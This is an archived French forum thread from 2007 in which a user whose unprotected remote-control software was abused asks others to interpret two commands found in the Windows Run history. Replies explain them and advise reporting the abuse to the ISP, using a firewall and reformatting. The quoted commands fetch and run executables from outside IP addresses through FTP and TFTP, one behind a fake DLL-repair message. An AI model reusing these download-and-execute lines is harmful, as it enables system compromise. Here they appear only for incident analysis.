Tchoumak Posté(e) le 1 mai 2007 Posté(e) le 1 mai 2007 Bonjour à tous, J'avais installé il y a quelque temps un outils permettant de prendre le controle de mon PC a distance, et malin comme je suis j'ai oublié de le désinstaller :( Du coup ce matin j'ai vu des fenetres s'ouvrir toutes seuls, et lorsque j'ai regardé mon historique de la commande "executer", voici ce que j'ai trouvé : cmd.exe /c del i&echo open 82.225.22.145 25276 > i&echo user 1 1 >> i &echo get 671.exe >> i &echo quit >> i &ftp -n -s:i &671.exe&del i&exit et %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET xkmgsaf.exe & start xkmgsaf& Je m'en suis apercu a ce moment la, et j'ai tout bloqué, puis désactivé mon outils de controle a distance... Quelqu'un saurais décrypter ce que le hackeur a voulu faire ? Merci d'avance !
gougou59 Posté(e) le 1 mai 2007 Posté(e) le 1 mai 2007 Il a voulu récupérer un fichier (671.exe) sur un ftp (82.225.22.145 25276) et l'exécuter... Pour la 2ème commande, je ne sais pas. Quelqu'un d'autre que vous à eu exactement le même soucis il y a quelques semaines!! On ne saurait trop le rappeler... Quand on installe un logiciel de prise de controle à distance, protegez le au moins par un mot de passe (complexe)!!!
Tintaspi Posté(e) le 1 mai 2007 Posté(e) le 1 mai 2007 Hum, c'est plus du windows que du réseau, mais bon... -Pour la première on dirait qu'il ouvre une connection pour télécharger un binaire windows et l'execute (surement un trojan ou autre...). -Pour la deuxième on dirait qu'il fait la même chose mais d'une façon différente (et un autre bianire)
Amour Posté(e) le 1 mai 2007 Posté(e) le 1 mai 2007 Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon) Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer...
Krapace Posté(e) le 1 mai 2007 Posté(e) le 1 mai 2007 Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon)Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer... Ca peut aussi etre un bot ...
Tchoumak Posté(e) le 1 mai 2007 Auteur Posté(e) le 1 mai 2007 Merci à tous pour vos réponses... Je vais effectivement envoyer un mail à Free, on ne sais jamais Sinon comment puis-je savoir si j'ai actuellement des ports ouverts ? J'ai le firewall de windows qui s'est déclenché, mais peut etre que ce n'est pas le meilleur... vous pourriez m'en recommander un (de preference gratuit) :)
Amour Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon)Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer... Ca peut aussi etre un bot ... Aucune importance, il doit être prévenu qu'il est soit : - Infecté - Idiot @kyro : perdu, je suis sur PAR69, et lui sur MNE69
sugeek Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 Sinon comment puis-je savoir si j'ai actuellement des ports ouverts ? J'ai le firewall de windows qui s'est déclenché, mais peut etre que ce n'est pas le meilleur... vous pourriez m'en recommander un (de preference gratuit) :) cmd -> netstat -a -> liste des ports ouverts kerio personal firewall
beuhbeuh Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 @kyro : perdu, je suis sur PAR69, et lui sur MNE69 HS : copain de NRA
Tchoumak Posté(e) le 2 mai 2007 Auteur Posté(e) le 2 mai 2007 On vient de me dire que dans sa tentative le hackeur a modifié une DLL système user32.dll, et que "c'est mort, si il a subilisé certaines DLL systemes, tu pourras utiliser n'importe quel logiciel de securité, son fonctionnement sera faussé parce que le systeme n'interpretera pas les commandes correctement, puisque le fonctionnement du coeur du systeme est altéré" Qu'en pensez vous ?
sugeek Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 je ne sais pas puisque je n'ai pas d information sur le temps entre ca commande et la coupure du logiciel de partage. Dans le doute tu format
sky25 Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 tu peux toujours essayer de passer ta freebox en mode routeur :) ( avec les modifications que cela entraine - ouverture de ports etc ... ) ainsi les tentatives de piratages via trojan etc .. n'aboutiront pas
sugeek Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 tu peux toujours essayer de passer ta freebox en mode routeur :) ( avec les modifications que cela entraine - ouverture de ports etc ... )ainsi les tentatives de piratages via trojan etc .. n'aboutiront pas sauf si les port du vnc like sont ouvert pour pouvoir le prendre depuis internet au quel ca bah ca revien au meme mais bon c clair mode router on ! always !
Tchoumak Posté(e) le 2 mai 2007 Auteur Posté(e) le 2 mai 2007 Je suis déjà en mode routeur... Je pense que now vu que le VNC server est désinstallé je crains plus rien de ce coté la, c'est au niveau des modifs qu'il a fait que ca me fait peur.
Eagle1 Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 met toi un firewall logiciel et tu sera tranquil....
_Iam-Nap_ Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET xkmgsaf.exe & start xkmgsaf& Reparation par redondance du user32.dll et injection 'xkmgsaf.exe' avec démarrage du ledit xkmgsaf.exe .... Bref il a bien trafiqué ta dll par un truc concocté par lui (xkmgsaf.exe, même sur google il n'y a pas de référence à cet exe ...) donc si j'etait toi ... format ou reparation de la partition windows
Tintaspi Posté(e) le 2 mai 2007 Posté(e) le 2 mai 2007 Euh j'y connais rien "script" windows, mais "echo Repairing user32.dll" ça ne fait pas qu'afficher "Repairing user32.dll" ?
Tchoumak Posté(e) le 2 mai 2007 Auteur Posté(e) le 2 mai 2007 Pas moyen de remettre la DLL d'origine ? en la copiant à partir d'un autre PC par exemple ?
Messages recommandés
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.